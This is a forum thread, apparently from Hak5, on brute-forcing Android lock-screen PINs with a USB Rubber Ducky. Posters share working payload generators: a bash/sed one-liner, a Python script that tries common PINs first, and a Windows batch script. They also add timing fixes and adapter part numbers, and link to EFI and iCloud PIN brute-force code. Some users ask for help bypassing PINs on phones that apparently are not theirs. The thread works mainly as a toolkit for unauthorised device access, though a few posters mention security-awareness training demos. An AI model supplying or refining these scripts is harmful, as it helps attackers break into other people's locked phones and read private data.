Bountyhunter50 Posted January 9, 2013 Share Posted January 9, 2013 I saw Darren's bash code, (I'm not gonna lie I was intimidated) but after running it, COOL!!! Now I Just need to find a willing test subject (Locked in for 2 yrs on my iPhone ) Quote Link to comment Share on other sites More sharing options...
Martinus101 Posted January 26, 2013 Share Posted January 26, 2013 Love the shows! Question: Is this the only way to do this? I would think to connect the phone to a normal computer and run the needed scripts from there will do the same? Question: What kind of software OS is running on the chip? Quote Link to comment Share on other sites More sharing options...
no42 Posted January 26, 2013 Share Posted January 26, 2013 Q1: No see above. Q2: The chip is a micro-controller, not an actual full-blown OS, its pre-programmed with a set of instructions triggered/executed by a series of interrupts. Quote Link to comment Share on other sites More sharing options...
beka Posted January 30, 2013 Share Posted January 30, 2013 Just playing around with the Android 4 digit pin code and a Samsung Galaxy S2. I noticed the S2 (maybe it depends on the version) didn't respond to the ENTER key on a external keyboard while in "standbye" mode. It will respond to the ESC key so if you have this problem change the DELAY 5000\nENTER to DELAY 5000\nESC. If you want to playaround with the rubber ducky script, first give it a try with an external keyboard. Maybe your timeout settings are different so you need to change the delay settings. Quote Link to comment Share on other sites More sharing options...
ed_ed Posted February 13, 2013 Share Posted February 13, 2013 This could work incredibly well when "Quick unlock" is enabled in Android's security settings, anyone tried it out yet? Quote Link to comment Share on other sites More sharing options...
JDale Posted February 13, 2013 Share Posted February 13, 2013 Been trying to the Ducky with paylaod script to brute force 4 digit phone lock, it times out after 3,000 attempts of 10,000 ??? Any thoughts as to why it stops at 3,000 when the script is for 10,000 Thanks in advance Quote Link to comment Share on other sites More sharing options...
soni.pc Posted November 2, 2013 Share Posted November 2, 2013 Can someone please tell me how to insert the payloads in the USB Rubber Ducky and does anyone have the payload for EFI PIN's (4 digits) Quote Link to comment Share on other sites More sharing options...
Hak 5 ish Posted April 23, 2014 Share Posted April 23, 2014 Can someone please tell me how to insert the payloads in the USB Rubber Ducky and does anyone have the payload for EFI PIN's (4 digits) im looking for the same. I have the code for Teensy 3. but i cant seem to get the payload to work correctly on the rubber duck. These links list the codes used for the teensy 3 For EFI brute forcing and icould pin brute forcing.. Can someone PLEASE take a look at it and see if it need to be edited to work on the rubber ducky http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/#UPDATE http://orvtech.com/en/howto/ataque-fuerza-bruta-pin-icloud/ Quote Link to comment Share on other sites More sharing options...
S3V3N Posted June 18, 2014 Share Posted June 18, 2014 the adapter that will work for the iPhone is called the Apple Camera adapter. I have a few apple devices, and it works for all of them. I have yet to try the iPhone5 yet though as this requires the new camera adapter. Now we just need to get the timing/code corrected as the iPhone is a bit different than the Android. Awesome Work!! Keep it up Darren!! Quote Link to comment Share on other sites More sharing options...
S3V3N Posted June 18, 2014 Share Posted June 18, 2014 Part Number for iPhone up to 4S: MC531ZM Part Number for iPhone 5: MD821ZM Quote Link to comment Share on other sites More sharing options...
dataghost Posted January 4, 2015 Share Posted January 4, 2015 To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed. port install gsedthen: echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txtNot sure whats going wrong with cygwin? How can i modify this script to put a delay between each key stroke. so basically enter 0 delay 500ms enter 0 delay 500ms enter 0 delay 500ms enter 1 etc Quote Link to comment Share on other sites More sharing options...
Ninjalizard Posted March 5, 2015 Share Posted March 5, 2015 Hey all, I'm trying to execute this payload on my ASUS tablet and it doesn't respond to ENTER, as suggested ive tried ESC along with OK,SPACE,RETURN,SUBMIT and TAB... any suggestions would be appriciated! Quote Link to comment Share on other sites More sharing options...
Jhall1 Posted March 20, 2015 Share Posted March 20, 2015 Hi great Ducky payload! This works great on my android platform of 4.4.2 Samsung but is that any update or way through more recent android versions, I have tested it on the HTC one M8 and the script begins to run and navigates to the pin screen but the keypad will only work from physical access to the phone and not by the ducky or usb keyboard. Any advice or tips would be great Jake Quote Link to comment Share on other sites More sharing options...
shamwow Posted July 7, 2015 Share Posted July 7, 2015 I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected. I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that. With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee. Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-) echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt will this script work against windows 10 pins as it is? Quote Link to comment Share on other sites More sharing options...
theGANOUSH Posted August 27, 2015 Share Posted August 27, 2015 If anyone is having problems with the bash script, I have written something similar in Python. I mostly use the Raspberry Pi to do all my encoding. This script will inject 20 of the most common pin codes first, and then brute force afterwards. #!/usr/bin/python defaultList = ['1234', '1111', '0000', '1212', '7777', '1004', '2000', '4444', '2222', '6969', '9999', '3333', '5555', '6666', '1122', '1313', '8888', '4321', '2001', '1010']; def main(): fileOpen = open("android_payload.txt", "w+") fileOpen.write("DELAY 5000\n") for x in defaultList: fileOpen.write("STRING %s\n" % x); fileOpen.write("ENTER\nDELAY 500\n") for w in range(0,10): for z in range(0,10): for y in range(0,10): for x in range(0,10): fileOpen.write("STRING %d%d%d%d\n" % (w,z,y,x)) if (x % 2) == 0: fileOpen.write("ENTER\n") fileOpen.write("ENTER\nDELAY 500\n") fileOpen.close() main() 2 Quote Link to comment Share on other sites More sharing options...
shrekthemp Posted October 2, 2015 Share Posted October 2, 2015 I am new to this program.script and USB Ducky. We use windows. I went to the online tool USB ducky toolkit to implement the code referenced above. Can someone help me recode it to work in the ducky toolkit. I would like to show this exercise on our training phones in class. Thank you. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted October 2, 2015 Share Posted October 2, 2015 What OS are you using? And is it the code from the first post? The bash code from the first post cannot be directly imported into the online compiler. Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class. Quote Link to comment Share on other sites More sharing options...
shrekthemp Posted October 8, 2015 Share Posted October 8, 2015 "Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class" I am using it on Samsung note phones with 4 digit pin set. It would be awesome to have you create the bin for me. I still would like to learn how to recreate the script in the toolkit if possible. My issue is the number creation I think. Thanks Quote Link to comment Share on other sites More sharing options...
Siem Posted October 15, 2015 Share Posted October 15, 2015 I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line. C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$ /\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt C:\Users\UserName\Desktop>dir android* Volume in drive C has no label. Volume Serial Number is 2499-C7D7 Directory of C:\Users\UserName\Desktop 07/07/2012 01:03 AM 165 Android Paths.txt 08/30/2012 08:00 PM 50 Android SDK Path.txt 12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt 3 File(s) 278 bytes 0 Dir(s) 831,818,436,608 bytes free C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt DELAY 5000 ; echo {0000..9999} STRING DELAY 1000 ENTER ENTER C:\Users\UserName\Desktop> Instead of using Linux terminal, I made a Batch script for this, it does the same thing, Here is the code; @echo off setlocal set NUM=0 set COUNT=0 echo REM Author: Siem>>input.txt echo REM Idea taken from: Darren Kitchen echo REM Description: Bruteforcer>>input.txt echo DELAY 1000>>input.txt echo.>>input.txt echo ESC>>input.txt echo DELAY 500>>input.txt echo STRING 0000>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo.>>input.txt :START cls IF %COUNT% EQU 5 (set COUNT=0 & call :WAIT) IF %NUM% LEQ 9 (set ZERO=000) IF %NUM% GTR 9 (set ZERO=00) IF %NUM% GTR 99 (set ZERO=0) IF %NUM% GTR 999 (set ZERO=%) IF %NUM% EQU 9999 (pause & exit) echo DELAY 500>>input.txt echo STRING %ZERO%%NUM%>>input.txt echo ENTER>>input.txt echo %ZERO%%NUM% set /a NUM=%NUM% + 1 set /a COUNT=%COUNT% +1 goto START :WAIT echo.>>input.txt echo REM Wait 30 seconds>>input.txt echo DELAY 30000>>input.txt echo ESC>>input.txt echo DELAY 500>>input.txt echo STRING 0000>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo DELAY 500>>input.txt echo BACKSPACE>>input.txt echo.>>input.txt You can change the delay a bit, I am still testing it, but this echos 0000..9999 without using Linux. ~Siem Quote Link to comment Share on other sites More sharing options...
adamxk Posted October 17, 2015 Share Posted October 17, 2015 why isn't this on the wiki? Quote Link to comment Share on other sites More sharing options...
LoreLorm Posted November 5, 2015 Share Posted November 5, 2015 Hi, I'm new to the forum and wondered if someone might be able to help me. I've been trying to get the Android brute force working for an awareness demo; however I'm not having much luck. I ran the bash script on the original post and created a new inject.bin but nothing happens when I insert it into the phone! Any help would be gratefully received. I have Samsung GT-S5830i Android version 2.3.6 Thanks Quote Link to comment Share on other sites More sharing options...
kooltrix Posted August 28, 2016 Share Posted August 28, 2016 Anyone have any suggestions as to how to keep the phone powered when attempting 5-pin code ? Doubt this phone will survive 160+ hours lol I've tried using a Targus USB Hub, however I don't think the Data from the Rubber Ducky can traverse through the hub into to the micro usb otg to usb android adapter.. unless I'm doing something wrong- which I don't doubt lol I guess an alternative is to break up the code into smaller chunks.. 00000-09999, 10000-19999, 20000-29999, and so on. would take forever lol any help would greatly be appreciated. cheers! Quote Link to comment Share on other sites More sharing options...
Gazeintotheabyss Posted October 20, 2016 Share Posted October 20, 2016 Could someone send me the ducky script for this code I'm having trouble running it on a galaxy core prime Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted October 20, 2016 Share Posted October 20, 2016 The phone may not support USB keyboard or the OTG cable you are using may not be working properly. Try running the duck in a notepad on your computer to see that it is typing things correctly to eliminate that variable. Quote Link to comment Share on other sites More sharing options...
Gazeintotheabyss Posted October 20, 2016 Share Posted October 20, 2016 So I've run the ducky script in notepad and I dont believe the galaxy core prime is compatable. (Doesn't accept a usb keyboard) any other suggestions on running a brute force pin hack or maybe another method to bypass the pin screen? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.